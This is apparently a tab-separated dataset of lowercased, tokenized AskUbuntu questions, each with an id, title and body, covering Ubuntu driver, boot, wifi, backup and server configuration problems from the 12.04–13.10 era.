395252	upgraded nvidia driver , now when i boot my screen is black	i am a new user to ubuntu , i have the linux ubuntu 13.10 version on my dual boot computer . i booted up my ubuntu os this morning and logged in and the screen resolution was all big , so i thought it might be an nvidia drivers issue . i looked on the net and found the terminal instructions to sudo apt-get the nvidia drivers . i followed the instructions and rebooted my system . i can get to the grub menu and pick my options : ubuntu but anything after that i get just a black screen . what can i do to fix this ? what did i do wrong ? any help would be appreciated , and thanks in advance . mikedh
395258	ubuntu 12.04 administrator how to write commands to run a py file as a startup with no terminal ?	i am a administrator user , not root user . currently i need to take the following steps everytime i enter ubuntu : 1.enter /home/nan/goagent/local 2.double click proxy.py , then a dialog shows : 3.click `` run '' 4.over . but this is really cumbersome . i tried to write command `` python /home/nan/goagent/local/proxy.py '' at a startup application . but it doesnot work . so , as a none-root user , what should i do to run proxy.py ( not in a terminal ) automatically when i start ubuntu ? thanks in advance . update , this is the py file 's property : info - [ dec 25 02:20:05 ] resolve common.iplist_map names= [ 'google_cn ' , 'google_hk ' , 'google_ipv6 ' , 'talk.google.com ' , 'talk.l.google.com ' , 'talkx.l.google.com ' ] to iplist info - [ dec 25 02:21:01 ] resolve name=google_hk host to iplist= [ '173.194.32.21 ' , '74.125.134.83 ' , '173.194.32.22 ' , '173.194.37.85 ' , '173.194.37.86 ' , '74.125.232.117 ' , '74.125.232.118 ' , '74.125.134.19 ' , '74.125.134.18 ' , '74.125.128.103 ' , '74.125.128.105 ' , '74.125.128.104 ' , '74.125.128.106 ' , '74.125.128.147 ' , '74.125.134.17 ' , '173.194.72.94 ' , '173.194.40.245 ' , '173.194.40.246 ' , '173.194.32.54 ' , '74.125.128.199 ' , '173.194.32.53 ' , '74.125.128.83 ' , '74.125.128.94 ' , '173.194.37.53 ' , '74.125.128.99 ' , '173.194.37.54 ' , '74.125.128.18 ' , '74.125.128.19 ' , '74.125.31.94 ' , '74.125.128.17 ' ] info - [ dec 25 02:21:01 ] resolve name=talk.google.com host to iplist= [ '74.125.128.125 ' ]
395260	making nano always run as sudo by default	my problem is that i keep forgetting to write sudo before every time i use nano , and eventually what happens is i work on a file for a while and do n't have permissions . i remember hearing somewhere that you can edit one of the files so that every time i type nano filename it will function as if i wrote sudo nano filename i havenât tried anything since i 've no previous knowledge about this . how would i go about doing this ?
395266	toshiba s75 low res graphics and partial solution	i wiped win8 off of new laptop . installed 12.04lts . after modifying grub2 the computer boots just fine ... except , it is in low graphics mode without 'red ' & 'yellow ' colors . however , if i boot with hdmi and external attached , all boots normally with full resolution graphics and all beautiful colors . if i suspend or reboot without hdmi/external monitor connected , i get the low res and not all colors . laptop has intel 4600 graphics . all updates for 12.04 have been completed . any suggestions ? many thanks , paul
395267	can not read `/dev/sda ' : input/output error livecd	i have computer dual-booted with ubuntu 13.04 and windows . ubuntu 's grub got some errors/destroyed ( do n't know how ) and shows grub rescue prompt . having searched here , i chose the easy way to repair grub , by boot-repair . i made live cd ( same version ) and installed boot-repair . but i boot-repair stuck at scanning system ( os-prober ) so i executed the sudo os-prober command in terminal and after waiting for a few minutes ( usually the command does n't take so long ) , i got the output : ( command has not finished executed since the $ prompt has not been shown yet ) error : can not read `/dev/sda ' : input/output error . error : can not read `/dev/sda ' : input/output error . error : can not read `/dev/sda ' : input/output error . /dev/sda1 : windows 8 ( loader ) : windows : chain error : can not read `/dev/sda ' : input/output error . there should not be any problem in the hardware since i am able to access everything fine while using windows . below is the output of sudo fdisk -l ( if it may help anyhow ) disk /dev/sda : 249.9 gb , 249923032064 bytes 255 heads , 63 sectors/track , 30384 cylinders , total 488130922 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x22dd22dc device boot start end blocks id system /dev/sda1 * 63 96149024 48074481 7 hpfs/ntfs/exfat /dev/sda2 96159803 488126825 195983511+ f w95 ext 'd ( lba ) /dev/sda5 96159805 162802709 33321452+ 7 hpfs/ntfs/exfat /dev/sda6 162802773 244204064 40700646 7 hpfs/ntfs/exfat /dev/sda7 244204128 317425707 36610790 7 hpfs/ntfs/exfat /dev/sda8 317427712 348610921 15591605 83 linux /dev/sda9 348615131 442087667 46736268+ 7 hpfs/ntfs/exfat /dev/sda10 442087792 488126825 23019517 7 hpfs/ntfs/exfat disk /dev/sdb : 4018 mb , 4018143232 bytes 255 heads , 63 sectors/track , 488 cylinders , total 7847936 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0138db66 device boot start end blocks id system /dev/sdb1 * 63 7847935 3923936+ b w95 fat32 here is the screenshot of disks ( sorry i do n't know how to use it to get the diagnostic info )
395272	fullscreen rdp connection on each monitor	i have two monitors and would like to have a fullscreen rdp connection on each . is this possible with remmina ? if not , can someone suggest another rdp client that does support this ?
395273	ubuntu battery indicator shows wrong battery	i am using the sony vaio pro with ubuntu 13.10 . i have the external sheet battery and when plugged in the battery indicator still shows the status of the internal battery rather than the currently in use battery . how can i change the indicator to show the charge of the currently in use battery ?
395274	problem .. individual desktop wallpapers for each workspace	after make individual desktop wallpapers for each viewport in ubuntu 13.10 by compiz . each time restart or shutdown when start ubuntu all desktop be black wallpaper . any help there ... ..
395276	which ubuntu release supported kernel version 2.4	i need an ubuntu release for a class project which uses linux kernel version 2.4 . could you help me with this ? or can i downgrade for a specific ubuntu release ?
395279	how to automatically execute a command in a terminal after a period without activity ?	i 've been looking for an option or script that executes a command after the terminal has been idle ( that 's no input nor output ) . the closest thing i 've found is setting the tmout=seconds variable so the terminal automatically closes . this can be done directly or adding the line to $ home/.profile what i 'm trying to do is that the gnome-terminal on my desktop resets or clears itself after not being used for , let 's say , 5 minutes .
395280	override distro package with custom package ?	ubuntu 12.04 lts provides openssl 1.0.1e , but it disables tlsv1.1 and tlsv1.2 . in the past it was an interop decision because of broken client implementations . in 2014 , its really not appropriate since the clients have had time to fix their broken-ness . any remaining broken clients are penalizing the majority of complying clients . i want to provide the same version of openssl 1.0.1e , but i want to provide the [ currently ] disabled protocols . i know i can create a personal package archive ( ppa ) , but its not clear to me if i can use it to override a ubuntu base package . ( i also realize statically linked clients will not benefit from the improved packaging ) . how does one provide an override to a specific package in ubuntu ?
395281	ubuntu wo n't boot after upgrading to 12.10	i have an asus s200e i had ubuntu 12.04 installed ( not dual boot ) i upgraded to 12.10 and immediately after the upgrade and on first booting up the purple ubuntu logo drops into a blank screen with just a cursor flashing . i managed to get into recovery and upgraded to 13.04 , but on booting the same thing happens . i have 12.04 on a usb . should i go back to this perhaps or does anyone have any suggestions ? i ca n't seem to get to recovery using shift at present . thanks for any help
395283	what 's the best practice for backing up encrypted ubuntu home dir ?	after installing ubuntu 12.04 and electing to encrypt my entire home directory , i am now wondering what the best way would be to back up the data here . i backed up the rest of my file system with the command tar -cvpjf sysbackup.tar.bz2 -- exclude=/sysbackup.tar.bz2 -- exclude=/sysbackup.log -- exclude=/home -- one-file-system / 1 > sysbackup.log ( and the boot/efi partition in a similar way ) , but i am unsure what do about the /home/user directory . option 1 ) backup the encrypted /home/.encryptfs/ $ user/.private and /home/.encryptfs/ $ user/.encryptfs dirs . then in the future , in case of disaster , recover it to access files with sudo ecryptfs-recover-private , as detailed here , from a live-cd . with the rest of my system backup , i could format and partition as before with gparted , then restore / , /home/.encryptfs/ $ user/.private and /home/.encryptfs/ $ user/.encryptfs . downside : possibly no tar compression , and probably no way to exclude subdirs . option 2 ) when i log in , the home dir is mounted with all files unencrypted automatically , so presumably i could simply make a tar of everything here ( the .encryptfs and .private in /home/ $ user are just symlinks to the real encrypted data at /home/.encryptfs/ $ user/ ... i think they may have something to with launching the auto-mount on login ? so i wo n't include these in backup ) the problem i see with option 2 ) in the event of system failure , it might not be possible just to format and partition the disk from the live-cd , restore / and then simply restore /home/ $ user because now /home/.encryptfs would be missing , so this might lead to issues , with ubuntu expecting encrypted home and trying to unexcrypt and mount the private directories normally in /home/.encryptfs but not finding these.. ( a secondary downside would be the tar is not stored in encrypted form , although gpg or deja dup could solve that concern anyway ) . what i 'm really asking is : if the system died , and i had to boot up via a live cd , format my linux partition and get out my backup , let 's say it 's on a usb stick , would i be able to simply mount the partion to /media/whatever extract everything excluding home from the backup of / ( via sudo tar -xvpzf /media/usb/path/to/backup.tar.gz -c /media/whatever -- numeric-owner ) , then create a /media/whatever/home/ $ user and simply copy all my plain-text home dir there ... and then reboot and get a system as it always was , or would the fact that i previously had an encrypted home dir cause some issue upon reboot ? would something in the way encryptfs start to complain ( and maybe not load my home dir properly ) , or would things be totally fine ? i suppose this is equivalent to if right now i just deleted my encrypted /home/ $ user and /home/.encryptfs dirs ( after unmounting on another user acc etc etc ) then recreated my /home/ $ user contents with the plain text files..i tried this experiment on a virtual machine and everything seemed to go through just fine , so i think encryptfs would not mess things up ... ( perhaps so long as the symlinks in the home dir are gone ? )
395288	installation ubuntu 12.04 64 bit on notebook toshiba : no root file system is defined	when i run installation of ubuntu 12.04 lts on my notebook toshiba intel core i5 , 6mb ram , 500 gb . i receive a message of `` no root file system is defined '' what can i do ?
395290	ubuntu for tablet pc artists ?	is there a tablet pc version of ubuntu for artists who draw with stylus in paint programs ? has anyone tried it on asus b121 , hp slate or other `` drawing tablets '' ? please provide links to articles or forums that discuss ubuntu for penabled tablets and digital artists . happy new year !
395291	plex media server : wo n't find media external hard drive	i am attempting to turn an older pc into a home media server with ubuntu 12.04 using plex media server . i have a newer wd 2 tb external usb hd with all of my media on it . i can not for the life of me figure out why plex will not recognize the files on this hard drive . it shows the external as there , ubuntu shows the files and allows me to play them , view them , etc . plex shows the name `` external '' . but when i click it , it is 100 % empty and shows nothing to add . i can access the files on the external through file sharing just fine , on my windows computers but would love to be able to use plex for streaming with our roku . i am fairly new to ubuntu , i have used plex with the same hd on windows and it worked fine . i have read multiple articles on this and nothing seems to be doing the trick . how can i solve this ?
395293	gitlab debian package	i need to install gitlab in my ubuntu 12.04 64-bit found the following link but it does n't work for me . we need it to be a debian package to simplify installation in my company network i know there is a bitnami installer but i do n't like it ( no trust with 3rd party ) note : i do n't want to accumulate scripts ! i need a simple install one-click gitlab is the ultimate git server manager for local networks and private companies
395295	`` gave up waiting for root device '' while booting	i just installed ubuntu 13.10 from usb flash ( with universal-usb-installer-1.9.4.4 ) . itâ´s well done . but i got boot problem when i restarted my notebook ( acer aspire 1410 , 2 gb ram , 250 gb hd , intel celeron ) the message appeared on screen : gave up waiting for root device . common problem : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system for the right device ? ) - missing modules ( cat /proc/modules ; ls/dev ) alert ! /dev/mapper/ubuntu -- vg-root does not exist . dropping to a shell ! busybox v1.20.2 ( ubuntu 1:1.20.0-8.1ubuntu ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . and prompt ( initframs ) how does it solved ?
395298	black screen after login when installing mesa 10 from source	i wanted to update my mesa version to 10.0 , so i compiled it from source , installed it , rebooted and when i logged in , i had a black screen with only my mouse visible . i have reinstalled ubuntu 13.10 a few times now , and tried to install mesa 10.0 again , and every time i get the same issue . i can just reinstall ubuntu now , but that does n't solve the problem of not having mesa version 10.0 . does anybody know how to install mesa 10.0 on ubuntu 13.10 64-bit without getting that black screen on login ? thanks !
395306	gitlab dpkg-buildpackage error	this is a question related to my other question i am following these instructions to build a debian package out of gitlab management software . i got the following error dpkg-buildpackage dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : -d_fortify_source=2 dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions -wl , -z , relro tail : can not open `debian/changelog ' for reading : no such file or directory dpkg-buildpackage : error : tail of debian/changelog gave error exit status 1 any help with the above errors
395310	gitlab omnibus ubuntu 12.04	i am trying to build gitlab from the omnibus project in my ubuntu 12.04 64-bit following this link after issuing sudo apt-get install ruby ruby-bundler i downloaded the source from here and after exrtaction i made a bundle install -- binstubs i got the following error : /usr/lib/ruby/vendor_ruby/bundler/rubygems_ext.rb:8 : in `require ' : no such file to load -- rubygems ( loaderror ) from /usr/lib/ruby/vendor_ruby/bundler/rubygems_ext.rb:8 from /usr/lib/ruby/vendor_ruby/bundler.rb:11 : in `require ' from /usr/lib/ruby/vendor_ruby/bundler.rb:11 from /usr/bin/bundle:4 : in `require ' from /usr/bin/bundle:4 what 's my problem ?
395312	maas shows nodes only after rebooting few times the machines	i have a virtual environment set up with esxi . i have a nat instance with ubuntu server and maas running with 2 network interfaces root @ nat : ~/.ssh # ifconfig eth0 link encap : ethernet hwaddr 00:50:56:00:28:1c inet addr:212.83.190.39 bcast:212.83.190.39 mask:255.255.255.255 inet6 addr : fe80 : :250:56ff : fe00:281c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1282867 errors:0 dropped:615 overruns:0 frame:0 tx packets:564013 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4281604355 ( 4.2 gb ) tx bytes:46893139 ( 46.8 mb ) eth1 link encap : ethernet hwaddr 00:0c:29 : a4 : b9:85 inet addr:192.168.100.1 bcast:192.168.100.1 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fea4 : b985/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:364937 errors:0 dropped:153 overruns:0 frame:0 tx packets:342248 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:26446675 ( 26.4 mb ) tx bytes:1848170051 ( 1.8 gb ) i also created 2 more instances that can successfully boot from the network and start the ubuntu lts maas-enlisting-node . why i can see a node listed only after rebooting few times the instance ? this is what i see on the maas web interface : hgnrf.master 00:0c:29:72 : f3 : f8 declared p.s . i already checked and the eth1 on the maas instance is configured correctly as dhcp and dns server . any help is appreciated ! thanks
395313	13.10 fresh install slow unity animations intel graphics	i just spent the past two days googling this and trying to find an answer before i posted . here 's the problem : i installed 13.10 64-bit fresh from a dvd and the various desktop animations in unity are slow and choppy . this includes the dashboard , the launcher tooltips , switching workspaces , switching apps etc . the whole desktop interface appears to be slow . graphical performance within apps is totally fine . here 's the results of my unity support test : $ /usr/lib/nux/unity_support_test -p opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) q35 opengl version string : 1.4 mesa 9.2.1 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes is there any more information i should check that might help me find a solution ?
395314	how can i install windows 7 ( 64 ) after having already installed ubuntu ( 64 ) ? the windows install manager says it ca n't install on a gpt drive	i installed ubuntu ( 64 ) on a partition of my 1tb drive . i left 200gb formatted on ntfs to install windows 7 ( 64 ) later and 600gb of free space . when i get to the part of selecting the partition to install win7 it says it 's not possible to install it on a gpt drive . i just finished building the pc today so the first thing i installed was ubuntu . can anybody help me with this ? edit : it seems that it 's relevant whether the system is uefi or not . my mobo is uefi .
395315	problem with loading ubuntu 12.04 besides windows 8 pre installed	i 'm a ubuntu newbie so forgive me when i need some time to understand your answers . i installed ubuntu server 12.04 besides a pre-installed windows 8 . when i start i get a grub interface with a couple of options . when i do n't choose ubuntu will start loading and stops after a few seconds with the following error : ini : unreadahead main process ( 295 ) terminated with status 5 adding xxxk swap on /dev/sda5 . priority : -1 extents:1 across : xxxxxxk ss ( he number 295 change with each restart ) i do n't know how to repair this . when i start ununtu in recovery mode and than choose `` resume '' it looks like it works fine . in grub i do n't see anything of windows . in the bios i disabled fast boot , secure boot how can i fix this ?
395319	how can a touchscreen be made to disable temporarily while an active digitiser is in use ?	i have a thinkpad yoga which features both a capacitive touchscreen and a wacom digitiser . i can disable the touchscreen manually ( using something such as xinput disable < id > in a command activated by a unity launcher icon ) , but i would prefer a more automated approach . samsung devices such as the galaxy note 3 and 8 ( which feature touchscreens and wacom digitisers together also ) disable the touchscreen whenever the active digitiser is active ( i.e. , near the screen ) . how could i have similar functionality on the thinkpad yoga ? thanks for any suggestions !
395329	external hdd isues	i have a dell latitude xfr d630 laptop-32 bit . also , i have an external hard drive with ubuntu 13.10 on it . also , my internal hard drive has windows xp and ubuntu 13.04 on it . however , i can not access any of the files such as movies , videos , pictures etc . on my external hard drive while i am using xp or ubuntu 13.04 . can some one tell me what do i need to do , preferably something not too complicated i am still a beginner with ubuntu .
395330	how to effectively disable touchpad without disabling touchpad buttons	i have a thinkpad yoga which has a trackpad/pointing stick and a touchpad with inbuilt buttons . the buttons of the touchpad are intended for use with either the touchpad or the pointing stick used as a pointer movement controller . how could i effectively disable the touchpad without disabling the buttons of the touchpad ( because they are required for use with the pointing stick ) ? thanks !
395331	python through command terminal , creating functions ?	i am new to ubuntu . i formerly used to use python on windows , and now i am learning ubuntu . when i open the command terminal , i type python and press enter , the symbol ( > > > ) is shown and i am in idle . however , i want to know how i can create functions and classes and the stuff i used to to in windows . thanks .
395333	ca n't boot windows 7 after installing ubuntu 13.04	i understand that there are a lot of similar questions on the forum about this issue . however , i ca n't find a possible solution for my problem . every time i start my laptop , it keeps giving me 4 options : 1 ) try ubuntu without installing . 2 ) install ubuntu . 3 ) oem install ( for manufacturers ) 4 ) check disc for defects . i do n't understand why it keeps giving me the first two options because i have tried to select and install ubuntu more than just one . i do n't understand what are the option 3 and 4 about so i do n't want to make thing worse . and i cant find any option that allows me to switch to windows 7 .
395336	fix problems caused by updating libraries	i have forced an upgrade ( you know when you use apt-get upgrade and it says some packages will not be upgraded ? i did apt-get install to those ) of a few libraries , i remember one of them had the name `` mesa '' in it . it took quite a while , it even had to remove a few packages ( various desktop-managers ) before installing the libraries and reinstalling the packages it removed . after a reboot ( i do n't know before ) virtual box , wine , playonlinux ( errors besides wine-only libraries appeared , also something with opengl saying games may not work ( and none does in fact ) ) all ceased to function correctly . i followed instructions across various sites ( including answers in this one , mainly about virtualbox ) thoroughly , and nothing 's fixed yet . i also tried to purge , reinstall , reboot , install missing dependencies ( apt-get install -f ) , etc . i had cross-over however , i have aptitude and i heard it often works better than apt-get ; should i try it ? what can i do there to correct this ? or anywhere ?
395344	desktop is gone	i was turning compiz on and when i reboot the only thing i see is my desktop wallpaper , 1st i tried crtl+alt+t to open terminal it worked , but now does n't work any more 2nd ctrl+alt+f1 ( tty ) asks for login i enter user name long wait and asks for login again with out a chance to enter password is there a way ( like windows style ) that you follow a path and open ccsm program ? so i can edit preferences ...
395347	all my virtual host go to the same site ?	i am having a problem with virtual host , all of them go to one site and i dont know why . this is a typical vhost config for one of many domains : < virtualhost *:80 > # # # server # # # # # # # # # # # # # # # # # servername domain.com serveralias www.domain.com serveradmin domains @ domain.com documentroot /mnt/volume1/domain # # # directory # # # # # # # # # # # # # # # # # # # # < directory /mnt/volume1/domain/ > options indexes followsymlinks multiviews allowoverride all require all granted < /directory > # # # logs # # # # # # # # # # # # # # # loglevel info errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /domain.access.log combined < /virtualhost > apache version is 2.4.6 -- ubuntu 13.10
395348	just updated from 8.04 to 10.4 to 12.04 and no internet and do n't understand 12.4 ... should i revert back ?	computer : dell inspiron 1420 intel core 2 duo t5550 ( 3gb , ddr2 , 667mhz ) running dual boot with windows vista and now ubuntu 12.04 firstly , i 'm not very linux/ubuntu savvy -- once things work i get it , but i 'm not good at installing things or editing files ... i.e . i need very specific instructions . i 've been using ubuntu 8.04 forever and love it -- i 've had my computer for over 5 years and it runs just as fast today as when i got it . but since 8.04 is n't supported anymore and i was having small issues like video in firefox , and firefox not updating i figured it was time to update and i just figured the most recent would be best . so i updated to 10.4 then 12.04 . now i can not connect to the internet in 12.04 . i believe i could in 10.4 . i 've restarted a couple times and it says upon restarting `` waiting for network configuration . '' when i go into system settings / network there is immediately a message that reads `` the system network services are not compatible with this version . '' i also do n't understand 12.04 , i do n't know where administration and the other drop down menu below it moved to , when i right click on a folder it does n't give me the options 8.04 gave me . i do like the look , the new menu bar and the workspace switcher ... . so if i could somehow get the internet working and understand the basics and how it changed from 8.04 , i would like to keep it . not sure if i can save 12.04 , or if i should revert back to 10.4 and try that , and if so the best way to do that . i did back up all my files ( not programs ) ... any advice would be much appreciated .
395355	problem in connecting through wvdial	i am in ubuntu 13.04 . i am using a huawei e169 mobile broadband dongle for connect internet . there was a problem in my network-manager program after uninstalling modemmanager application . so i tried and see weather i can connect through wvdial via gnome ppp . in the gnome ppp , there are spaces for enter username and password . i contacted the service provider and asked about the username and password . they told that it is not need to enter username or password and adviced me to leave it blank . i followed their instructions and tried to connect . but the gnome ppp was hanged around sending password ... in the connection log it was mention that there was not a valid login . question is : can i use wvdial for mobile broadband connections ? if yes , is it essential to enter username and password ? if not , how can i bypass it ?
395356	create new document ?	when right click is pressed and create new document is highlighted there is only one option [ empty document ] . how more options can be placed [ like new libre office writer document ] ?
395359	wifi issue ubuntu13.10	asus x55c wifi not enabling . the wifi is disabled by hardware switch . switch on laptop is un-responsive . wireless is enabled in the bios as well .
395361	remote desktop problem	my version of ubuntu is 13.04 64bit . i have installed tightvncserver and ubuntu-desktop . also i did a demo service by tutorial link . when im trying to connect using ipv6 i can see a error . anyone know how to fix it ?
395363	keyboard behaves differently under bash	when logged to other computer from windows under bash , putty maps keys properly but under other shells like sh or zsh keys like delete are mapped incorrectly ( to ~ character ) . setting xterm to different maps does not change anything . my current linux map seems to be correct ( delete key function kdch1 is mapped to \e [ 3~ and cat outputs ^ [ [ 3~ ) . why changing shells has this strange effect ? maybe this keymap is actually not used and there are newer mechanisms ? i have no ~/.inputrc , /etc/inputrc has following content : # do not bell on tab-completion # set bell-style none set meta-flag on set input-meta on set convert-meta off set output-meta on # completed names which are symbolic links to # directories have a slash appended . set mark-symlinked-directories on $ if mode=emacs # for linux console and rh/debian xterm '' \e [ 1~ '' : beginning-of-line '' \e [ 4~ '' : end-of-line '' \e [ 5~ '' : beginning-of-history '' \e [ 6~ '' : end-of-history '' \e [ 3~ '' : delete-char '' \e [ 2~ '' : quoted-insert '' \e [ 5c '' : forward-word '' \e [ 5d '' : backward-word '' \e [ 1 ; 5c '' : forward-word '' \e [ 1 ; 5d '' : backward-word # for rxvt '' \e [ 8~ '' : end-of-line # for non rh/debian xterm , ca n't hurt for rh/debian xterm '' \eoh '' : beginning-of-line '' \eof '' : end-of-line # for freebsd console '' \e [ h '' : beginning-of-line '' \e [ f '' : end-of-line $ endif
395365	video performance is terribly slow on dot-s netbook	i face a problem with playing videos after i switched from windows xp to lubuntu in my packardbell dot-s netbook . i believe the graphic card driver was n't installed correctly . can anyone help me with it ? this is the output of : lspci -nnk | grep -i vga : 00:02.0 vga compatible controller [ 0300 ] : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller [ 8086 : a011 ]
395366	lspci shows wireless network device but network manager does n't	the laptop is a sony vaio , model number vgn-cr290 . i dropped it last night . the hard drive was bad , but i was able to fix that . after about 4 or 5 hours of trying to get wifi to work , i gave up . i have tried re-seating the card , time and time again . so , messing around on google , and the prompt , i have found the following things out . lspci does show the device : 02:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev01 ) the hardware switch is on , how ever rfkill shows only the bluetooth device 0 : hci0 : bluetooth soft blocked : no hard blocked : no the network manager shows no wifi device . why am i getting the contradictions in readings ? is there something i can do in software to fix this ? also when i try to shutdown my computer , even from the command prompt , the computer seems to halt , but not power down .
395367	trying ubuntu using a bootable usb and creating an account	i want to create a bootable usb and have downloaded the iso file and will create this on a 16gb san disk usb drive . i have read that you can create an account once you have inserted the usb and booted from it , then selected try ubuntu . once this is done will it boot a viable operating system with login rather than selecting try ubuntu each time or do i have to install to the usb drive ? thanks in advance .
395369	installing ubuntu alongside a pre-installed version of windows 8 with uefi	i 've heard a lot of good things about ubuntu , so i decided to try it out on my hp notebook 2000 laptop ( via liveusb ) . my laptop came pre-installed with windows 8 , and it has a uefi system . however , every time i try to boot from the usb ( 16 gb ) , i get an error message saying `` selected boot device failed '' . i turned off secureboot , but i still get the same result . i have also tried creating the liveusb from both rufus and the universal usb installer . quick recap of what i 'm using : hp notebook 2000 laptop , windows 8 pre-installed with uefi ubuntu 13.10 liveusb - 16 gb ( tried rufus and uui ) secureboot is off note : i still need to be able to boot to windows 8 , i just want to be able to play around with ubuntu
395371	log in to cups admin in browser ?	i want to use a wireless printer . i googled it and it said to go to website : 127.0.0.1:631/ and click on admin . it asks me to log in . i put in my ubuntu name and password and get denied . does anybody know who owns this website so i can request a password ? is it owned by canonical ?
395372	update problem and ubunto error	whenever i try to open system tools or setting or when i make a reboot.. a notification appears saying '' ubunto is experiencing an internal error '' and also there is a permanent message on the top right ''an error occurred ... ... .this usually means that your installed packages have unmet dependencies '' i do n't want to make update coz i can not reopen server again ! ! i lost much server data before like this.. please help
395384	install ubuntu from usb key	after reading many identical questions , answers and documents , i still had a hard time to get this one wor . i do n't have a ubuntu os machine , but a laptop running on centos 6 , it does not have dvd / cd driver , but i want to install untuntu in another partition . i can copy ubuntu iso image to the usb key from command line , but that 's not what document required to use startup disk creator to download and install utuntu iso image to the usb key . in centos , i can use command line to copy basic configuration files directories to one partition of vfat , and the iso image to another partition ext3 to allow installation is booted from vfat and to install iso image from ext3 . that did not work in ubuntu installation . my question is how to copy iso image and configure files / directory to a usb key manually using command line ( not any tools ) , then to install ubunto from the usb key ? thank you . kind regards , jupiter
395387	ca n't resize scratch window	whenever i try to resize the scratch window , it turns black as below and slowly reduces in width until it 's a line on the screen . if i try to maximise the window , it also turns black but the width does n't reduce . however , when i minimize/unmaximize it , it behaves as when i try to resize it . i can not close the window once this happens and have to do it from system monitor . anyone know the cause of this problem and how to fix it ?
395393	wireless not working on toshiba s55-a5294 , rtl8188ee	out of the box wifi continuously prompts for password and never connects . ( sorry , i had to leave the 'h ' off of the 'http ' because i do n't have enough rep to post more than 2 links ) model : toshiba s55-a5294 card : lspci -v | grep -i wireless 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter ( rev 01 ) ubuntu and kernel versions tried : ubuntu 13.10 3.11.0-12-generic ubuntu 13.10 3.11.0-12-generic i have tried several things : 1 ) compiling and using realtek drivers per : ttp : //ubuntuforums.org/showthread.php ? t=2162026 result : errors found in ttp : //ubuntuforums.org/showthread.php ? t=2183804 . 2 ) drivers and instructions provided by ttp : //askubuntu.com/questions/337785/wireless-not-working-on-toshiba-satellite-c55-a5281 result : wifi continuously prompts for password and never connects . 3 ) using the modified drivers per instructions on https : //github.com/freedomben/rtl8188ce-linux-driver recommended by bb1netusaf2004 on http : //ubuntuforums.org/showthread.php ? t=2183804 . i reset the modules ( drivers ) to the original kernal ones before this step . result : now i can connect to my wifi , but nothing loads all requests appear to timeout ( websites , router , ect.. ) it seems so close to working now . prior to doing step 3 : lsmod | grep ^rtl rtl8188ee 89614 0 rtl_pci 26641 1 rtl8188ee rtlwifi 63229 2 rtl_pci , rtl8188ee after step 3 : lsmod | grep ^rtl rtl8188ee 138201 0 rtlwifi 110108 1 rtl8188ee so , i was wondering if missing the trl_pci module is the problem . i have tried modprobe rtl_pci fatal : module rtl_pci not found . step 3 does not appear to create this module , but it is still in the /lib/modules/ [ kernel name ] / ... directory . anyone have any ideas on how to get the wifi working for this card ? *************** info trace *************** ***** uname -a ***** linux kyle-satellite-s55-a 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux ***** lsb_release ***** distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy ***** lspci ***** 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:0181 ] kernel driver in use : rtl8188ee 03:00.0 ethernet controller [ 0200 ] : qualcomm atheros qca8171 gigabit ethernet [ 1969:10a1 ] ( rev 10 ) subsystem : toshiba america info systems device [ 1179 : fa40 ] kernel driver in use : alx ***** lsusb ***** bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 13d3:5606 imc networks bus 001 device 003 : id 058f:6366 alcor micro corp. multi flash reader bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 046d : c517 logitech , inc. lx710 cordless desktop laser bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ***** pcmcia card info ***** ***** iwconfig ***** wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off ***** rfkill ***** 1 : phy0 : wireless lan soft blocked : no hard blocked : no ***** lsmod ***** rtl8188ee 89614 0 rtl_pci 26641 1 rtl8188ee rtlwifi 63229 2 rtl_pci , rtl8188ee mac80211 596969 3 rtl_pci , rtlwifi , rtl8188ee cfg80211 479757 2 mac80211 , rtlwifi ***** nm-tool ***** networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi 